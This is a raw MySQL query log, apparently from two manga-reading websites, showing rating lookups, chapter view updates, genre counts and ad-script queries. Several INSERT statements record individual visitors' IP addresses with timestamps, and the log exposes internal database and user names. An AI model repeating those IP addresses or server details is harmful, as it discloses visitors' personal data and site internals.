mangauser@localhost on u317079482_mangaberri_1 using Socket 330644207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330644207 Quit 330644208 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330644208 Quit 330644209 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330644209 Quit 330644210 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330644210 Quit 330644211 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330644211 Quit 330644212 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330644212 Quit 330644213 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330644213 Quit 330644214 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330644214 Quit 330644215 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330644215 Quit 330644216 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330644216 Quit 330644217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330644217 Quit 330644218 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330644218 Quit 330644219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330644219 Quit 330644220 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330644220 Quit 330644221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330644221 Quit 330644222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330644222 Quit 330644223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330644223 Quit 330644224 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330644224 Quit 330644225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330644225 Quit 330644226 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330644226 Quit 330644227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330644227 Quit 330644228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330644228 Quit 330644229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330644229 Quit 330644230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330644230 Quit 330644231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330644231 Quit 330644232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330644232 Quit 330644233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330644233 Quit 330644234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330644234 Quit 330644235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330644235 Quit 330644236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330644236 Quit 330644237 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330644237 Quit 330644238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330644238 Quit 330644239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330644239 Quit 330644240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330644240 Quit 330644241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330644241 Quit 330644242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330644242 Quit 330644243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330644243 Quit 330644244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330644244 Quit 330644245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330644245 Quit 330644246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330644246 Quit 330644247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330644247 Quit 330644248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330644248 Quit 330644249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330644249 Quit 330644250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330644250 Quit 330644251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330644251 Quit 330644252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330644252 Quit 330644253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330644253 Quit 330644254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330644254 Quit 330644255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330644255 Quit 330644256 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '253' order by created desc 330644256 Quit 330644257 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330644257 Quit 330644258 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330644258 Quit 330644259 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330644260 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644259 Quit 330644260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330644260 Quit 330644261 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330644261 Quit 330644262 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330644262 Quit 330644263 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330644263 Quit 330644264 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330644264 Quit 330644265 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330644265 Quit 330644266 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330644266 Quit 330644267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330644267 Quit 330644268 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330644268 Quit 330644269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330644269 Quit 330644270 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330644270 Quit 330644271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330644271 Quit 330644272 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330644272 Quit 330644273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330644273 Quit 330644274 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330644274 Quit 330644275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330644275 Quit 330644276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330644276 Quit 330644277 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330644277 Quit 330644278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330644278 Quit 330644279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330644279 Quit 330644280 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330644280 Quit 330644281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330644281 Quit 330644282 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330644282 Quit 330644283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330644283 Quit 330644284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330644284 Quit 330644285 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330644285 Quit 330644286 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330644286 Quit 330644287 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330644287 Quit 330644288 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330644288 Quit 330644289 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330644289 Quit 330644290 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330644290 Quit 330644291 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330644291 Quit 330644292 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330644292 Quit 330644293 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330644293 Quit 330644294 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330644294 Quit 330644295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330644295 Quit 330644296 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330644296 Quit 330644297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330644297 Quit 330644298 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330644298 Quit 330644299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330644299 Quit 330644300 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330644300 Quit 330644301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330644301 Quit 330644302 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330644302 Quit 330644303 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330644303 Quit 330644304 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330644304 Quit 330644305 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330644305 Quit 330644306 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330644306 Quit 330644307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330644307 Quit 330644308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330644308 Quit 330644309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330644309 Quit 330644310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330644310 Quit 330644311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330644311 Quit 330644312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330644312 Quit 330644313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330644313 Quit 330644314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330644314 Quit 330644315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330644315 Quit 330644316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644316 Quit 330644317 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12881' and m.active = 1 330644317 Quit 330644318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644318 Query select * FROM chapters where id = '12881' 330644318 Quit 330644319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644319 Query select * FROM chapters where manga_id = '274' order by display_priority ASC, id desc 330644319 Quit 330644320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644320 Query Update chapters set view=view+1 where id = '12881' 330644320 Quit 330644321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644321 Query select * FROM chapters where id = '12881' 330644321 Quit 330644322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644322 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12881' and m.active = 1 330644322 Quit 330644323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644323 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('274', '12881', '216.244.66.201', 'mangaberri.com', '2026-02-26 03:28:28', '2026-02-26 03:28:28') 330644323 Quit 330644324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644324 Query select * FROM chapter_images where chapter_id = '12881' 330644324 Quit 330644325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644325 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '274' and m.active = 1 330644325 Quit 330644326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644326 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='274' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330644326 Quit 330644327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644327 Quit 330644328 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644328 Quit 330644329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644329 Quit 330644330 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644330 Quit 330644331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644331 Quit 330644332 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644332 Quit 330644333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644333 Quit 330644334 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644334 Quit 330644335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644335 Quit 330644336 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11528' and m.active = 1 330644336 Quit 330644337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644337 Query select * FROM chapters where id = '11528' 330644337 Quit 330644338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644338 Query select * FROM chapters where manga_id = '193' order by display_priority ASC, id desc 330644338 Quit 330644339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644339 Query Update chapters set view=view+1 where id = '11528' 330644339 Quit 330644340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644340 Query select * FROM chapters where id = '11528' 330644341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644341 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11528' and m.active = 1 330644340 Quit 330644341 Quit 330644342 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644342 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('193', '11528', '104.249.72.22', 'mangaberri.com', '2026-02-26 03:28:28', '2026-02-26 03:28:28') 330644342 Quit 330644343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644343 Query select * FROM chapter_images where chapter_id = '11528' 330644343 Quit 330644344 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644344 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' and m.active = 1 330644345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644344 Quit 330644345 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='193' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%School%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330644345 Quit 330644346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644346 Quit 330644347 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644347 Quit 330644348 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644348 Quit 330644349 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644349 Quit 330644350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644350 Quit 330644351 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644351 Quit 330644352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644352 Quit 330644353 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644353 Quit 260225 19:28:30 330644354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644354 Quit 330644355 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11522' 330644355 Quit 330644356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644356 Query select * FROM chapters where id = '11522' 330644356 Quit 330644357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644357 Query select * FROM chapters where manga_id = '104' order by id desc 330644357 Quit 330644358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644358 Query Update chapters set view=view+1 where id = '11522' 330644358 Quit 330644359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644359 Query select * FROM chapters where id = '11522' 330644359 Quit 330644360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644360 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11522' 330644360 Quit 330644361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644361 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('104', '11522', '2607:fb91:1582:66:4cf5:2b77:c3d1:b624', 'mangacherri.com', '2026-02-26 03:28:30', '2026-02-26 03:28:30') 330644361 Quit 330644362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 